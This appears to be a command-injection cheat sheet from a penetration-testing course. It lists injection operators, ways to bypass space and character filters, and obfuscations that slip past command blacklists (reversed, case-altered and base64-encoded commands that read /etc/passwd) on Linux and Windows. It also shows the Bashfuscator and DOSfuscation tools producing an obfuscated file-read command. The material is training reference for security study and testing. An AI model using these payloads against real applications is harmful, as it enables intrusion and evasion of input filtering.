Command injections




Injection operators

Injection Operator 	Injection Character 	URL-Encoded Character 	Executed Command
Semicolon 	; 	%3b 	Both
New Line 	\n 	%0a 	Both
Background 	& 	%26 	Both (second output generally shown first)
Pipe 	| 	%7c 	Both (only second output is shown)
AND 	&& 	%26%26 	Both (only if first succeeds)
OR 	|| 	%7c%7c 	Second (only if first fails)
Sub-Shell 	`` 	%60%60 	Both (Linux-only)
Sub-Shell 	$() 	%24%28%29 	Both (Linux-only)


printenv 	Can be used to view all environment variables
%09 	Using tabs instead of spaces
${IFS} 	Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())
{ls,-la} 	Commas will be replaced with spaces
Other Characters 	
${PATH:0:1} 	Will be replaced with /
${LS_COLORS:10:1} 	Will be replaced with ;
$(tr '!-}' '"-~'<<<[) 	Shift character by one ([ -> \)

Blacklisted Command Bypass

Code 	Description
Character Insertion 	
' or " 	Total must be even
$@ or \ 	Linux only
Case Manipulation 	
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") 	Execute command regardless of cases
$(a="WhOaMi";printf %s "${a,,}") 	Another variation of the technique
Reversed Commands 	
echo 'whoami' | rev 	Reverse a string
$(rev<<<'imaohw') 	Execute reversed command
Encoded Commands 	
echo -n 'cat /etc/passwd | grep 33' | base64 	Encode a string with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) 	Execute b64 encoded string


Filtered Character Bypass

Code 	Description
Get-ChildItem Env: 	Can be used to view all environment variables - (PowerShell)
%09 	Using tabs instead of spaces
%PROGRAMFILES:~10,-5% 	Will be replaced with a space - (CMD)
$env:PROGRAMFILES[10] 	Will be replaced with a space - (PowerShell)
Other Characters 	
%HOMEPATH:~0,-17% 	Will be replaced with \ - (CMD)
$env:HOMEPATH[0] 	Will be replaced with \ - (PowerShell)

Blacklisted Command Bypass

Code 	Description
Character Insertion 	
' or " 	Total must be even
^ 	Windows only (CMD)
Case Manipulation 	
WhoAmi 	Simply send the character with odd cases
Reversed Commands 	
"whoami"[-1..-20] -join '' 	Reverse a string
iex "$('imaohw'[-1..-20] -join '')" 	Execute reversed command
Encoded Commands 	
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) 	Encode a string with base64
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

Evasion Tools


A handy tool we can utilize for obfuscating bash commands is Bashfuscator.

git clone
cd Bashfuscator
python3 install --user


There is also a very similar tool that we can use for Windows called DOSfuscation. Unlike Bashfuscator, this is an interactive tool.

git clone
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation> help

We can even use tutorial to see an example of how the tool works. Once we are set, we can start using the tool, as follows:

Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\Encoding> 1

typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt

Finally, we can try running the obfuscated command on CMD, and we see that it indeed works as expected:

C:\htb> typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt


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